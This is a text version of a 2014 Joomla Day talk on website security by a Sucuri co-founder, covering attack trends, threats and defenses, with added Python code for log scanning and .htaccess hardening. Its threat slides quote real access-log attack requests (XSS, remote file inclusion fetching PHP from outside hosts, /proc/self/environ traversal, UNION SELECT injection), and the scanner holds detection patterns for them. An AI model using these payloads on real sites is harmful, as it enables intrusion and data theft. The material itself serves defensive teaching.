Joomla! Day Atlanta 2014 - Website Security - The Basics
Setting The Foundation: Joomla Website Security
04/11/2023
# WHOIS PEREZBOX
Organization: Sucuri, Inc., Co-Founder, Chief Operating Officer (@sucuri_security, @perezbox)
Specialization: Website Security, Incident Handling, Log Analysis
Special Interests: Working Out, Brazilian Jiu-Jitsu
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 2
Website Security Company
Global Operations
Platform Agnostic (i.e., Joomla, WordPress, etc.)
Scan 2M Unique Domains a Month
Block 4M web attacks a Month
Remediate 400 – 500 websites a day
Signature / Heuristic Based
24/7 operations
Today’s Discussion
Trends Threats Defenses
SIMPLE RIGHT?
Trends
Explosion in Web Malicious Links
Chart: Malicious Links, 2011 vs 2012: a 600% increase.
Malicious Links?
Diagram: malicious links reach users through social media, email, websites and text messages.
The Web Is The Source
Chart: Known Malware vs Unknown Malware; value shown: 90%.
What’s a Good Host?
Chart: Not Infected vs Infected; value shown: 85%.
Malware Type Distribution
Chart: Malware Type Distribution. Categories as listed: Remote iFrame Includes, Remote JavaScript Includes, SPAM Injections, Obfuscated / Encoded JavaScript, Conditional Redirects, Defacements, Other. Values shown: 26%, 19%, 16%, 14%, 11%, 4%, 10%.
9 Million Unique Domains Scanned, 19% Infected
Moving Beyond WordPress
Targets: Apache, SSH, Email Server
Going deeper than the application layer, targeting the server.
Server polymorphism, a.k.a. it changes a lot
Exploiting Forms
Stick With Reputable Sources
Generating SPAM emails, resource hogs
IP blacklisting
Spear Phishing / Phishing Increase
55% of Companies have fallen victim
Search Engine Poisoning (SEP)
Examples: Pharmacy, Payday Loans
Automated Attacks
Targets: Administrator, Templates / Extensions, Payload
Exploiting Access Control: Brute Force Attacks
Cross-Site Contamination
Diagram: Site 1, Site 2, Site 3, Site 4.
iFrame Injections
Drive By Downloads
Targeting Zero Days
Targeting Mobile Devices
Google is On Fire
Brute Force Attacks
Denial of Service (DOS)
Brute Force vs Denial of Service
Exploiting Trust
There’s a Tool for that
Explosion in the Malware as a Service (MaaS) trade: yes, you can pay someone to hack for you
Different tools to break in and generate payloads: brute force, vulnerability exploits, malware payloads
Blackhole Exploit Kit: today's market leader (2013, SophosLabs)
Don’t Worry, Everyone is a Target
Threats
Anatomy of Web Attacks
Stages: Recon, Identify, Attack, Decisions, Sustain
What kind of website do you have? Use for malware? Burrow into network? Steal data?
Cross-Site Scripting (XSS)
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Types: Stored, Reflective
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Remote / Local File Inclusion (RFI / LFI)
SQL Injection
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
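The access-log lines on the XSS, RFI/LFI and SQL injection slides above are what a defender greps for after the fact. The following added example (not from the talk) is a small log scanner that URL-decodes each request before matching, so the encoded XSS and the null-byte LFI are caught alongside the plain-text cases; the signatures are narrow illustrations, an assumption rather than a WAF ruleset.

```python
"""Flag the attack patterns from the XSS, RFI/LFI and SQL injection slides in
Apache combined-format access-log lines. Added example, not from the talk; the
signatures are narrow illustrations and an assumption, not a WAF ruleset."""
import re
from urllib.parse import unquote_plus

# Combined log: optional "client ident user", then [timestamp], "METHOD path PROTO", status.
# The client prefix is optional because one of the slide's lines starts at the timestamp.
LOG_RE = re.compile(
    r'^(?:(?P<ip>\S+) \S+ \S+ )?\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Matched against the URL-decoded path, so %3Cscript%3E and <script> look the same.
SIGNATURES = {
    "xss":  re.compile(r"<\s*/?\s*script|\bon(?:error|load|mouseover)\s*=|javascript:", re.I),
    "rfi":  re.compile(r"[?&][a-z_]+=(?:https?|ftp)://", re.I),   # remote URL fed to a file parameter
    "lfi":  re.compile(r"(?:\.\./){2,}|/proc/self/environ|\x00"),  # traversal, environ, NUL truncation
    "sqli": re.compile(r"\bunion\b.{0,40}\bselect\b|--\s*$", re.I),
}

def classify_request(path: str) -> list:
    """Return the signature names that fire on one request path."""
    decoded = unquote_plus(unquote_plus(path))  # two passes catch double-encoded payloads
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines) -> list:
    """Return (client, status, categories) for every line that triggers a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        cats = classify_request(m["path"])
        if cats:
            hits.append((m["ip"] or "-", int(m["status"]), cats))
    return hits

# Four lines from the slides (user-agent fields trimmed) plus one constructed benign request.
SAMPLE_LOG = [
    '123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268',
    '[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983',
    '82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 -',
    '62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336',
    '10.0.0.5 - - [03/Apr/2013:12:00:00 -0400] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, status, cats in scan_log(SAMPLE_LOG):
        print(client, status, ",".join(cats))
```

Note that the timthumb and SQL injection lines returned 200, which is the cue to check whether the request actually succeeded rather than just that it was attempted.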
Spear Phishing
Backdoors
Free is not always Free
http://forum.joomla.org/viewtopic.php?t=795946
- Autson Skitter Slideshow (mod_AutsonSlideShow): the malicious code is located in the "tmpl" folder, in the php file(s).
- Share This for Joomla! (mod_JoomlaShare This): the malicious code is located in mod_JoomlaShare This.php.
- VirtueMart Advanced Search (mod_virtuemart_advsearch): the malicious code is located in mod_virtuemart_advsearch.php.
- AddThis For Joomla (mod_AddThisForJoomla): the malicious code is located in mod_AddThisForJoomla.php.
- Plimun Nivo Slider (mod_PlimunNivoSlider): the malicious code is located in the "tmpl" folder, in the php file(s).
What’s all this mean?
Brand Reputation
Legal Implications
Impact to Sales
Blacklisted by Search Engines
Blacklisted by Payment Processors
Worst Day of Your Life
Defenses
The Foundation
Sucuri properties suffer ~125,000 web-based attacks a month on average
~4,000 attacks a day; this spikes on occasion
Doesn't include server level attacks
All flavors of attacks
Areas to Focus On
Principles, Access Control, Vulnerabilities
Manage your expectations
“It’s about risk reduction… risk will never be zero…”
Defense in Depth
“…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…”
Access
Passwords
Complex, Long, Unique
Principle of Least Privilege
“requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.”
Stay Informed - Vulnerabilities
Disable PHP Execution
PHP execution, disable it in these directories: Cache, Tmp, Modules, Components, Images
http://blog.sucuri.net/2013/08/joomla-media-manager-attacks-in-the-wild.html
<Files *.php>
Deny from all
</Files>
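The snippet above is dropped into a .htaccess file in each listed directory. The following added example (not Sucuri's or Joomla's own code) writes that rule where it is missing and verifies where it is already present; the apache24 switch is an assumption about the host, since on Apache 2.4 without mod_access_compat the 2.2-style Deny directive is rejected and every request into the directory fails.

```python
"""Deploy and verify the per-directory .htaccess from the slide that blocks
direct requests to *.php under Joomla's cache/tmp/modules/components/images
directories. Added example, not Sucuri's or Joomla's own code; apache24 is an
assumption about the host's Apache version."""
import os
import re
import tempfile

JOOMLA_DIRS = ["cache", "tmp", "modules", "components", "images"]  # from the slide

def deny_php_rule(apache24: bool = True) -> str:
    # The slide shows the Apache 2.2 form. On 2.4 without mod_access_compat 'Deny'
    # is an unknown directive (500 on every request), so use 'Require all denied'.
    inner = "Require all denied" if apache24 else "Deny from all"
    return "<Files *.php>\n    %s\n</Files>\n" % inner

# A <Files *.php> block carrying either deny form (Apache directives are case-insensitive).
RULE_RE = re.compile(r"<Files\s+\*\.php>.*?(Require all denied|Deny from all).*?</Files>", re.I | re.S)

def is_protected(htaccess_path: str) -> bool:
    """True when an existing .htaccess already denies direct *.php requests."""
    if not os.path.isfile(htaccess_path):
        return False
    with open(htaccess_path, encoding="utf-8", errors="replace") as fh:
        return RULE_RE.search(fh.read()) is not None

def protect_dirs(root: str, dirs=JOOMLA_DIRS, apache24: bool = True) -> dict:
    """Append the rule where missing; returns {dir: 'present' | 'written' | 'missing'}.
    A <Files> block also applies to subdirectories, so images/.htaccess covers images/stories/."""
    result = {}
    for name in dirs:
        path = os.path.join(root, name, ".htaccess")
        if not os.path.isdir(os.path.join(root, name)):
            result[name] = "missing"      # not a Joomla root, or the directory is absent
        elif is_protected(path):
            result[name] = "present"
        else:
            with open(path, "a", encoding="utf-8") as fh:   # append, keep existing rules
                fh.write(deny_php_rule(apache24))
            result[name] = "written"
    return result

def demo() -> tuple:
    """Constructed layout: images/ unprotected, tmp/ already carrying the 2.2-style rule."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "images"))
    os.mkdir(os.path.join(root, "tmp"))
    with open(os.path.join(root, "tmp", ".htaccess"), "w", encoding="utf-8") as fh:
        fh.write(deny_php_rule(apache24=False))
    first = protect_dirs(root)
    return first, protect_dirs(root)   # second run must be a no-op
```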
Please Backup
Stay Current (Update)
Website Application Firewalls
Biggest Weakness / Vulnerability
10 Stupid Administrator Tricks
1. Fix index.php file and assume all is fine.
2. Panic your way into Joomla! Forums after hack.
3. Don’t worry about updating.
4. Trust third-party extensions.
5. Apply all upgrades on live site.
6. Install and forget, all is well with your new site.
7. Use the same username and password for everything.
8. Don’t waste time making security adjustments to PHP and settings.
9. No regular backups required.
10. Use the cheapest host.
Notable Resources
Sucuri Blog: http://blog.sucuri.net
Sucuri TV: http://sucuri.tv
Malware Scanner: http://sitecheck.sucuri.net
Malware Scanner: http://unmaskparasites.com
Badware Busters: https://badwarebusters.org
Google Forums: http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
Google Webmaster Tools: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB: http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
Joomla! Security and Performance FAQs: http://docs.joomla.org/Security_and_Performance_FAQs
Joomla! Security Checklist: http://docs.joomla.org/Security_Checklist/Getting_Started
Questions?